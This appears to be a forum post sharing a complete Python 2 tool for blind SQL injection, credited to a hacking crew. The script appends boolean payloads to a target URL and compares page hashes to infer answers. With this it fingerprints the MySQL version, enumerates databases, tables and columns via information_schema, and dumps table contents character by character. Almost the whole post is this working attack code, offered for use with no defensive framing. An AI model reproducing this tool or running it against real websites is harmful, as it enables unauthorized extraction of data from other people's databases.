13 Years of Service
24%
[Python] BSI - Blind SQL Injection Tool
Name: BSI - Blind SQL Injection Tool
Release-Date: 06.02.2012
Coder: gehaxelt
Sprache: Python
The correct:
=> BSI.py
--all
Name: BSI - Blind SQL Injection Tool
Release-Date: 06.02.2012
Coder: gehaxelt
Sprache: Python
Code:
>import re, urllib2, datetime, sys, hashlib
def calcMD5(string):
return hashlib.md5(string).hexdigest()
def getDateString():
date=datetime.date.today()
return str(date.day)+"_"+str(date.month)+"_"+str(date.year)
def log(string):
file=open("log-"+getDateString()+".txt","a")
file.write(string+"\n")
file.close()
def getContent(url):
try:
request=urllib2.urlopen(url)
return request.read();
except:
print "Error sending HTTP-Request"
return ""
def checkKeyWord(content,keyword):
if(keyword == calcMD5(content)):
return True
else:
return False
def checkIsKeywordUnique(url,keyword):
if(checkKeyWord(getContent(url+"+and+1=1+--+"),keyword) and checkKeyWord(getContent(url+"+and+1=2+--+"),keyword)):
print "Keyword "+keyword+" is not unique!"
return False
return True
def getContentLength(url,keyword,query):
start=1
for i in range(0,250,25):
if(checkKeyWord(getContent(url+"+AnD+LeNgTh("+query+")>"+str(i)+"+--+"),keyword)):
start=i
break
for i in range(start,300):
if(checkKeyWord(getContent(url+"+AnD+LeNgTh("+query+")="+str(i)+"+--+"),keyword)):
return i
print "Error getting contentlength!"
print "Exiting!"
exit()
def getDBContent(url,keyword,query,length):
tmp=""
for i in range(1,length+1):
if(checkKeyWord(getContent(url+"+and+ascii(substring("+query+","+str(i)+",1))>=97+--+"),keyword)):
start=97
end=126
elif(checkKeyWord(getContent(url+"+and+ascii(substring("+query+","+str(i)+",1))>=65+--+"),keyword)):
start=65
end=96
elif(checkKeyWord(getContent(url+"+and+ascii(substring("+query+","+str(i)+",1))>=48+--+"),keyword)):
start=48
end=64
else:
start=33
end=47
for j in range(start,end,1):
if(checkKeyWord(getContent(url+"+and+ascii(substring("+query+","+str(i)+",1))="+str(j)+"+--+"),keyword)):
tmp=tmp+chr(j)
print "Content: "+tmp
break
return tmp
def getRowCount(url,keyword,query):
start=1
for i in range(0,250,25):
if(checkKeyWord(getContent(url+"+and+("+query+")>"+str(i)+"+--+"),keyword)):
start=i
break
for i in range(start,250):
if(checkKeyWord(getContent(url+"+and+("+query+")="+str(i)+"+--+"),keyword)):
return i
print "Error getting rowcount!"
print "Exiting"
exit()
def getVersion(url,keyword):
log(">>>"+url)
print "Getting version():"
if(checkKeyWord(getContent(url+"+and+substring(version(),1,1)=5+--+"),keyword)):
print "Version is: 5.x"
log(">Version is: 5.x")
elif(checkKeyWord(getContent(url+"+and+substring(version(),1,1)=4+--+"),keyword)):
print "Version is: 4.x"
log(">Version is: 4.x")
else:
print "Error getting the version"
log(">Error getting the version")
def getDatabase(url,keyword):
log(">>>"+url)
print "Getting databasecount..."
rows=getRowCount(url,keyword,"select+count(*)+from+information_schema.schemata")
print "Databasecount is: "+str(rows)
content=[]
for i in range(0,rows,1):
print "["+str(i)+"]Getting databaselength..."
rowlen=getContentLength(url,keyword,"(select+schema_name+from+information_schema.schemata+where+schema_name++0x"+"information_schema".encode("hex")+"+limit+"+str(i)+",1)")
print "["+str(i)+"]Databaselength is: "+str(rowlen)
print "["+str(i)+"]Getting databasename..."
content.append(getDBContent(url,keyword,"(select+schema_name+from+information_schema.schemata+where+schema_name++0x"+"information_schema".encode("hex")+"+limit+"+str(i)+",1)",rowlen))
print "["+str(i)+"]Databasename is: "+ content[len(content)-1]
log(">["+str(i)+"]Databasename is: "+ content[len(content)-1])
print "Finished!"
print "Databases found:"
i=0
for id in range(0,len(content)):
print "["+str(i)+"]"+content[id]
log(">["+str(i)+"]"+content[id])
print "Getting database():"
print "Getting contentlength..."
clength=getContentLength(url,keyword,"database()")
print "Contentlength is: "+str(clength)
log(">Contentlength is: "+str(clength))
print "Getting content..."
content=getDBContent(url,keyword,"database()",clength)
print "Content is: "+content
log(">Content is: "+content)
def getUser(url,keyword):
log(">>>"+url)
print "Getting user():"
print "Getting contentlength..."
clength=getContentLength(url,keyword,"user()")
print "Contentlength is: "+str(clength)
log(">Contentlength is: "+str(clength))
print "Getting content..."
content=getDBContent(url,keyword,"user()",clength)
print "Content is: "+content
log(">Content is: "+content)
def getTables(url,keyword):
log(">>>"+url)
print "Getting tablecount..."
rows=getRowCount(url,keyword,"select+count(*)+from+information_schema.tables+where+table_schema++0x696e666f726d6174696f6e5f736368656d61")
print "Tablecount is: "+str(rows)
log(">Tablecount is: "+str(rows))
content=[]
for i in range(0,rows,1):
print "["+str(i)+"]Getting tablelength..."
rowlen=getContentLength(url,keyword,"(select+table_name+from+information_schema.tables+where+table_schema++0x696e666f726d6174696f6e5f736368656d61+limit+"+str(i)+",1)")
print "["+str(i)+"]Tablelength is: "+str(rowlen)
print "["+str(i)+"]Getting tablename..."
content.append(getDBContent(url,keyword,"(select+table_name+from+information_schema.tables+where+table_schema++0x696e666f726d6174696f6e5f736368656d61+limit+"+str(i)+",1)",rowlen))
print "["+str(i)+"]Tablename is: "+ content[len(content)-1]
log(">["+str(i)+"]Tablename is: "+ content[len(content)-1])
print "Finished!"
print "Tables found:"
i=0
for id in range(0,len(content)):
print "["+str(i)+"]"+content[id]
log(">["+str(i)+"]"+content[id])
def getColumns(url,keyword,table):
log(">>>"+url)
print "Getting columncount..."
rows=getRowCount(url,keyword,"select+count(*)+from+information_schema.columns+where+table_name+=+0x"+table.encode("hex"))
print "Columncount is: "+str(rows)
content=[]
for i in range(0,rows,1):
print "["+str(i)+"]Getting columnlength..."
rowlen=getContentLength(url,keyword,"(select+column_name+from+information_schema.columns+where+table_name+=+0x"+table.encode("hex")+"+limit+"+str(i)+",1)")
print "["+str(i)+"]Columnlength is: "+str(rowlen)
print "["+str(i)+"]Getting columnname..."
content.append(getDBContent(url,keyword,"(select+column_name+from+information_schema.columns+where+table_name+=+0x"+table.encode("hex")+"+limit+"+str(i)+",1)",rowlen))
print "["+str(i)+"]Columnname is: "+ content[len(content)-1]
log(">["+str(i)+"]Columname is: "+ content[len(content)-1])
print "Finished!"
print "Columns found:"
i=0
for id in range(0,len(content)):
print "["+str(i)+"]"+content[id]
log(">["+str(i)+"]"+content[id])
def Dump(url,keyword,table,cols):
log(">>>"+url)
print "Getting rowcount..."
rows=getRowCount(url,keyword,"select+count(*)+from+"+table)
print "Rowcount is: "+str(rows)
content=[]
for i in range(0,rows,1):
print "["+str(i)+"]Getting rowlength..."
rowlen=getContentLength(url,keyword,"(select+concat_ws(0x3a,"+cols+")+from+"+table+"+limit+"+str(i)+",1)")
print "["+str(i)+"]Rowlength is: "+str(rowlen)
print "["+str(i)+"]Getting rowcontent..."
content.append(getDBContent(url,keyword,"(select+concat_ws(0x3a,"+cols+")+from+"+table+"+limit+"+str(i)+",1)",rowlen))
print "["+str(i)+"]Rowcontent is: "+ content[len(content)-1]
log(">["+str(i)+"]Rowcontent is: "+ content[len(content)-1])
print "Finished!"
print "Content found:"
i=0
for id in range(0,len(content)):
print "["+str(i)+"]"+content[id]
log(">["+str(i)+"]"+content[id])
def usage():
print '''
Usage:
=> BSI.py URL KEYWORD option[s]
Options:
=>--database\t\tRetrieves the current database
=>--version\t\tRetrieves the DBMS-version
=>--user\t\tRetrieves the current DB-user
=>--all\t\t\tRetrieves the three information mentioned bevor
=>--tables\t\tRetrieves all tables in the database
=>--columns TABLENAME\tRetrieves all columns of the given table
=>--dump TABLE COLUMN1,COLUMN2,...\tRetrieves the data of a table
==>Currently only dumps of database() are possible!
Example:
=> BSI.py http://127.0.0.1/vuln.php?id=10 --all
'''
def header():
print '''
Blind SQL Injector by Coding Crew @ Hack-Werk.ru
Version 1.1
Visit www.hack-werk.ru
'''
try:
header()
url= sys.argv[1]
keyword=calcMD5(getContent(url))
if(checkIsKeywordUnique(url,keyword)):
print "Keyword is unique!"
if(sys.argv[2]=="--version"):
log("\n>>>>New attack: version()")
getVersion(url,keyword)
elif(sys.argv[2]=="--database"):
log("\n>>>>New attack: database()")
getDatabase(url,keyword)
elif(sys.argv[2]=="--user"):
log("\n>>>>New attack: user()")
getUser(url,keyword)
elif(sys.argv[2]=="--all"):
log("\n>>>>New attack: version()/user()/database()")
getVersion(url,keyword)
getUser(url,keyword)
getDatabase(url,keyword)
elif(sys.argv[2]=="--tables"):
log("\n>>>>New attack: tables")
getTables(url,keyword)
elif(sys.argv[2]=="--columns"):
tname=sys.argv[3]
log("\n>>>>New attack: columns of "+tname)
getColumns(url,keyword,tname)
elif(sys.argv[2]=="--dump"):
tname=sys.argv[3]
cols=sys.argv[4].strip()
log("\n>>>>New attack: Dump "+cols+" from "+tname)
Dump(url,keyword,tname,cols)
else:
print "Error: Unkown option!"
print "Exiting"
exit()
except:
usage()
exit()=> BSI.py
This link is hidden for visitors. Please Log in or register now.